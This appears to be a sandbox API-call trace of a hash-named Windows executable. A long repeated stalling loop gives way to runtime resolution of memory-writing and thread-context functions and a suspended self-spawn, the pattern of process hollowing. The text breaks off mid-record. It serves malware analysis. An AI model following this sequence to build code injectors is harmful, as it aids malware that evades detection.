GetSystemDefaultLangID () returned 0x25f0409 [0067.842] GetThreadLocale () returned 0x409 [0067.842] GetCurrentProcess () returned 0xffffffff [0067.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.842] GetSystemDefaultLangID () returned 0x25f0409 [0067.842] GetThreadLocale () returned 0x409 [0067.842] GetCurrentProcess () returned 0xffffffff [0067.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.842] GetSystemDefaultLangID () returned 0x25f0409 [0067.842] GetThreadLocale () returned 0x409 [0067.842] GetCurrentProcess () returned 0xffffffff [0067.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.843] GetSystemDefaultLangID () returned 0x25f0409 [0067.843] GetThreadLocale () returned 0x409 [0067.843] GetCurrentProcess () returned 0xffffffff [0067.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.843] GetSystemDefaultLangID () returned 0x25f0409 [0067.843] GetThreadLocale () returned 0x409 [0067.843] GetCurrentProcess () returned 0xffffffff [0067.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.843] GetSystemDefaultLangID () returned 0x25f0409 [0067.843] GetThreadLocale () returned 0x409 [0067.843] GetCurrentProcess () returned 0xffffffff [0067.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.843] GetSystemDefaultLangID () returned 0x25f0409 [0067.843] GetThreadLocale () returned 0x409 [0067.843] GetCurrentProcess () returned 0xffffffff [0067.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.843] GetSystemDefaultLangID () returned 0x25f0409 [0067.843] GetThreadLocale () returned 0x409 [0067.843] GetCurrentProcess () returned 0xffffffff [0067.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.843] GetSystemDefaultLangID () returned 0x25f0409 [0067.843] GetThreadLocale () returned 0x409 [0067.843] GetCurrentProcess () returned 0xffffffff [0067.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.843] GetSystemDefaultLangID () returned 0x25f0409 [0067.843] GetThreadLocale () returned 0x409 [0067.843] GetCurrentProcess () returned 0xffffffff [0067.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.844] GetSystemDefaultLangID () returned 0x25f0409 [0067.844] GetThreadLocale () returned 0x409 [0067.844] GetCurrentProcess () returned 0xffffffff [0067.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.844] GetSystemDefaultLangID () returned 0x25f0409 [0067.844] GetThreadLocale () returned 0x409 [0067.844] GetCurrentProcess () returned 0xffffffff [0067.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.844] GetSystemDefaultLangID () returned 0x25f0409 [0067.844] GetThreadLocale () returned 0x409 [0067.844] GetCurrentProcess () returned 0xffffffff [0067.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.844] GetSystemDefaultLangID () returned 0x25f0409 [0067.844] GetThreadLocale () returned 0x409 [0067.844] GetCurrentProcess () returned 0xffffffff [0067.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.844] GetSystemDefaultLangID () returned 0x25f0409 [0067.844] GetThreadLocale () returned 0x409 [0067.844] GetCurrentProcess () returned 0xffffffff [0067.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.844] GetSystemDefaultLangID () returned 0x25f0409 [0067.844] GetThreadLocale () returned 0x409 [0067.844] GetCurrentProcess () returned 0xffffffff [0067.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.844] GetSystemDefaultLangID () returned 0x25f0409 [0067.845] GetThreadLocale () returned 0x409 [0067.845] GetCurrentProcess () returned 0xffffffff [0067.845] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.845] GetSystemDefaultLangID () returned 0x25f0409 [0067.845] GetThreadLocale () returned 0x409 [0067.845] GetCurrentProcess () returned 0xffffffff [0067.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.856] GetSystemDefaultLangID () returned 0x25f0409 [0067.856] GetThreadLocale () returned 0x409 [0067.856] GetCurrentProcess () returned 0xffffffff [0067.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.856] GetSystemDefaultLangID () returned 0x25f0409 [0067.856] GetThreadLocale () returned 0x409 [0067.857] GetCurrentProcess () returned 0xffffffff [0067.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.857] GetSystemDefaultLangID () returned 0x25f0409 [0067.857] GetThreadLocale () returned 0x409 [0067.857] GetCurrentProcess () returned 0xffffffff [0067.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.859] GetSystemDefaultLangID () returned 0x25f0409 [0067.859] GetThreadLocale () returned 0x409 [0067.859] GetCurrentProcess () returned 0xffffffff [0067.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.859] GetSystemDefaultLangID () returned 0x25f0409 [0067.859] GetThreadLocale () returned 0x409 [0067.859] GetCurrentProcess () returned 0xffffffff [0067.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.859] GetSystemDefaultLangID () returned 0x25f0409 [0067.859] GetThreadLocale () returned 0x409 [0067.859] GetCurrentProcess () returned 0xffffffff [0067.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.860] GetSystemDefaultLangID () returned 0x25f0409 [0067.860] GetThreadLocale () returned 0x409 [0067.860] GetCurrentProcess () returned 0xffffffff [0067.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.860] GetSystemDefaultLangID () returned 0x25f0409 [0067.860] GetThreadLocale () returned 0x409 [0067.860] GetCurrentProcess () returned 0xffffffff [0067.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.860] GetSystemDefaultLangID () returned 0x25f0409 [0067.860] GetThreadLocale () returned 0x409 [0067.860] GetCurrentProcess () returned 0xffffffff [0067.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.860] GetSystemDefaultLangID () returned 0x25f0409 [0067.860] GetThreadLocale () returned 0x409 [0067.860] GetCurrentProcess () returned 0xffffffff [0067.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.860] GetSystemDefaultLangID () returned 0x25f0409 [0067.860] GetThreadLocale () returned 0x409 [0067.860] GetCurrentProcess () returned 0xffffffff [0067.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.860] GetSystemDefaultLangID () returned 0x25f0409 [0067.860] GetThreadLocale () returned 0x409 [0067.861] GetCurrentProcess () returned 0xffffffff [0067.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.861] GetSystemDefaultLangID () returned 0x25f0409 [0067.861] GetThreadLocale () returned 0x409 [0067.861] GetCurrentProcess () returned 0xffffffff [0067.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.861] GetSystemDefaultLangID () returned 0x25f0409 [0067.861] GetThreadLocale () returned 0x409 [0067.861] GetCurrentProcess () returned 0xffffffff [0067.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.861] GetSystemDefaultLangID () returned 0x25f0409 [0067.861] GetThreadLocale () returned 0x409 [0067.861] GetCurrentProcess () returned 0xffffffff [0067.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.861] GetSystemDefaultLangID () returned 0x25f0409 [0067.861] GetThreadLocale () returned 0x409 [0067.861] GetCurrentProcess () returned 0xffffffff [0067.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.861] GetSystemDefaultLangID () returned 0x25f0409 [0067.862] GetThreadLocale () returned 0x409 [0067.862] GetCurrentProcess () returned 0xffffffff [0067.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.862] GetSystemDefaultLangID () returned 0x25f0409 [0067.862] GetThreadLocale () returned 0x409 [0067.862] GetCurrentProcess () returned 0xffffffff [0067.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.862] GetSystemDefaultLangID () returned 0x25f0409 [0067.862] GetThreadLocale () returned 0x409 [0067.862] GetCurrentProcess () returned 0xffffffff [0067.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.862] GetSystemDefaultLangID () returned 0x25f0409 [0067.862] GetThreadLocale () returned 0x409 [0067.862] GetCurrentProcess () returned 0xffffffff [0067.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.862] GetSystemDefaultLangID () returned 0x25f0409 [0067.862] GetThreadLocale () returned 0x409 [0067.862] GetCurrentProcess () returned 0xffffffff [0067.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.862] GetSystemDefaultLangID () returned 0x25f0409 [0067.862] GetThreadLocale () returned 0x409 [0067.862] GetCurrentProcess () returned 0xffffffff [0067.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.862] GetSystemDefaultLangID () returned 0x25f0409 [0067.862] GetThreadLocale () returned 0x409 [0067.862] GetCurrentProcess () returned 0xffffffff [0067.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.862] GetSystemDefaultLangID () returned 0x25f0409 [0067.863] GetThreadLocale () returned 0x409 [0067.863] GetCurrentProcess () returned 0xffffffff [0067.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.863] GetSystemDefaultLangID () returned 0x25f0409 [0067.863] GetThreadLocale () returned 0x409 [0067.863] GetCurrentProcess () returned 0xffffffff [0067.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.863] GetSystemDefaultLangID () returned 0x25f0409 [0067.863] GetThreadLocale () returned 0x409 [0067.863] GetCurrentProcess () returned 0xffffffff [0067.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.863] GetSystemDefaultLangID () returned 0x25f0409 [0067.863] GetThreadLocale () returned 0x409 [0067.863] GetCurrentProcess () returned 0xffffffff [0067.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.863] GetSystemDefaultLangID () returned 0x25f0409 [0067.863] GetThreadLocale () returned 0x409 [0067.863] GetCurrentProcess () returned 0xffffffff [0067.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.863] GetSystemDefaultLangID () returned 0x25f0409 [0067.863] GetThreadLocale () returned 0x409 [0067.863] GetCurrentProcess () returned 0xffffffff [0067.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.863] GetSystemDefaultLangID () returned 0x25f0409 [0067.863] GetThreadLocale () returned 0x409 [0067.863] GetCurrentProcess () returned 0xffffffff [0067.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.864] GetSystemDefaultLangID () returned 0x25f0409 [0067.864] GetThreadLocale () returned 0x409 [0067.864] GetCurrentProcess () returned 0xffffffff [0067.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.864] GetSystemDefaultLangID () returned 0x25f0409 [0067.864] GetThreadLocale () returned 0x409 [0067.864] GetCurrentProcess () returned 0xffffffff [0067.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.864] GetSystemDefaultLangID () returned 0x25f0409 [0067.864] GetThreadLocale () returned 0x409 [0067.864] GetCurrentProcess () returned 0xffffffff [0067.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.864] GetSystemDefaultLangID () returned 0x25f0409 [0067.864] GetThreadLocale () returned 0x409 [0067.864] GetCurrentProcess () returned 0xffffffff [0067.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.864] GetSystemDefaultLangID () returned 0x25f0409 [0067.864] GetThreadLocale () returned 0x409 [0067.864] GetCurrentProcess () returned 0xffffffff [0067.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.864] GetSystemDefaultLangID () returned 0x25f0409 [0067.864] GetThreadLocale () returned 0x409 [0067.864] GetCurrentProcess () returned 0xffffffff [0067.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.864] GetSystemDefaultLangID () returned 0x25f0409 [0067.864] GetThreadLocale () returned 0x409 [0067.864] GetCurrentProcess () returned 0xffffffff [0067.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.865] GetSystemDefaultLangID () returned 0x25f0409 [0067.865] GetThreadLocale () returned 0x409 [0067.865] GetCurrentProcess () returned 0xffffffff [0067.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.865] GetSystemDefaultLangID () returned 0x25f0409 [0067.865] GetThreadLocale () returned 0x409 [0067.865] GetCurrentProcess () returned 0xffffffff [0067.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.865] GetSystemDefaultLangID () returned 0x25f0409 [0067.865] GetThreadLocale () returned 0x409 [0067.865] GetCurrentProcess () returned 0xffffffff [0067.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.865] GetSystemDefaultLangID () returned 0x25f0409 [0067.865] GetThreadLocale () returned 0x409 [0067.865] GetCurrentProcess () returned 0xffffffff [0067.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.865] GetSystemDefaultLangID () returned 0x25f0409 [0067.865] GetThreadLocale () returned 0x409 [0067.865] GetCurrentProcess () returned 0xffffffff [0067.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.865] GetSystemDefaultLangID () returned 0x25f0409 [0067.865] GetThreadLocale () returned 0x409 [0067.865] GetCurrentProcess () returned 0xffffffff [0067.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.865] GetSystemDefaultLangID () returned 0x25f0409 [0067.865] GetThreadLocale () returned 0x409 [0067.865] GetCurrentProcess () returned 0xffffffff [0067.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.866] GetSystemDefaultLangID () returned 0x25f0409 [0067.866] GetThreadLocale () returned 0x409 [0067.866] GetCurrentProcess () returned 0xffffffff [0067.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.866] GetSystemDefaultLangID () returned 0x25f0409 [0067.866] GetThreadLocale () returned 0x409 [0067.866] GetCurrentProcess () returned 0xffffffff [0067.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.866] GetSystemDefaultLangID () returned 0x25f0409 [0067.866] GetThreadLocale () returned 0x409 [0067.866] GetCurrentProcess () returned 0xffffffff [0067.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.866] GetSystemDefaultLangID () returned 0x25f0409 [0067.866] GetThreadLocale () returned 0x409 [0067.866] GetCurrentProcess () returned 0xffffffff [0067.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.866] GetSystemDefaultLangID () returned 0x25f0409 [0067.866] GetThreadLocale () returned 0x409 [0067.866] GetCurrentProcess () returned 0xffffffff [0067.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.866] GetSystemDefaultLangID () returned 0x25f0409 [0067.866] GetThreadLocale () returned 0x409 [0067.866] GetCurrentProcess () returned 0xffffffff [0067.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.866] GetSystemDefaultLangID () returned 0x25f0409 [0067.866] GetThreadLocale () returned 0x409 [0067.866] GetCurrentProcess () returned 0xffffffff [0067.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.867] GetSystemDefaultLangID () returned 0x25f0409 [0067.867] GetThreadLocale () returned 0x409 [0067.867] GetCurrentProcess () returned 0xffffffff [0067.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.867] GetSystemDefaultLangID () returned 0x25f0409 [0067.867] GetThreadLocale () returned 0x409 [0069.355] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0069.356] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0069.356] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0069.357] VirtualProtect (in: lpAddress=0x2601f48, dwSize=0xf490, flNewProtect=0x40, lpflOldProtect=0x19e838 | out: lpflOldProtect=0x19e838*=0x4) returned 1 [0069.380] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0069.380] GetProcAddress (hModule=0x76720000, lpProcName="GlobalAlloc") returned 0x76739950 [0069.381] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0069.381] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0069.381] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0069.381] GetProcAddress (hModule=0x76720000, lpProcName="CreateToolhelp32Snapshot") returned 0x76747b50 [0069.381] GetProcAddress (hModule=0x76720000, lpProcName="Module32First") returned 0x767644b0 [0069.381] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0069.382] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xac [0069.391] Module32First (hSnapshot=0xac, lpme=0x19f1dc) returned 1 [0069.391] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x24d0000 [0069.404] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0069.404] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0069.404] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageExtraInfo") returned 0x74403690 [0069.404] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="WinExec") returned 0x7675ff70 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadContext") returned 0x7673ec60 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="VirtualFree") returned 0x76737600 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="ReadProcessMemory") returned 0x76761c80 [0069.405] GetProcAddress (hModule=0x76720000, lpProcName="WriteProcessMemory") returned 0x76762850 [0069.406] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadContext") returned 0x76762490 [0069.406] GetProcAddress (hModule=0x76720000, lpProcName="ResumeThread") returned 0x7673a800 [0069.406] GetProcAddress (hModule=0x76720000, lpProcName="WaitForSingleObject") returned 0x76746820 [0069.406] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0069.406] GetProcAddress (hModule=0x76720000, lpProcName="GetCommandLineA") returned 0x7673ab60 [0069.406] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771d0000 [0069.406] GetProcAddress (hModule=0x771d0000, lpProcName="NtUnmapViewOfSection") returned 0x77246f40 [0069.407] GetProcAddress (hModule=0x771d0000, lpProcName="NtWriteVirtualMemory") returned 0x77247040 [0069.407] GetProcAddress (hModule=0x743d0000, lpProcName="RegisterClassExA") returned 0x74404e90 [0069.407] GetProcAddress (hModule=0x743d0000, lpProcName="CreateWindowExA") returned 0x74406f30 [0069.407] GetProcAddress (hModule=0x743d0000, lpProcName="PostMessageA") returned 0x743ff0e0 [0069.407] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageA") returned 0x743fe130 [0069.407] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcA") returned 0x7725aed0 [0069.407] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesA") returned 0x76746a20 [0069.407] GetProcAddress (hModule=0x76720000, lpProcName="GetStartupInfoA") returned 0x76739c10 [0069.407] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtectEx") returned 0x76762790 [0069.435] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0069.435] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0069.436] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0069.436] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0069.436] RegisterClassExA (param_1=0x19ee98) returned 0xc1de [0069.437] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x302f2 [0074.898] PostMessageA (hWnd=0x302f2, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0074.898] GetMessageA (in: lpMsg=0x19eec8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19eec8) returned 1 [0074.898] GetMessageA (in: lpMsg=0x19eec8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19eec8) returned 1 [0074.898] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x24f0000 [0074.898] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f0000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe")) returned 0x62 [0074.899] GetStartupInfoA (in: lpStartupInfo=0x19edec | out: lpStartupInfo=0x19edec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0074.899] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe\" " [0074.899] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe", lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19edec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x19ee44 | out: lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe\" ", lpProcessInformation=0x19ee44*(hProcess=0x110, hThread=0x10c, dwProcessId=0xc90, dwThreadId=0xc98)) returned 1 [0074.917] VirtualFree (lpAddress=0x24f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.919] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x24f0000 [0074.919] GetThreadContext (in: hThread=0x10c, lpContext=0x24f0000 | out: lpContext=0x24f0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, 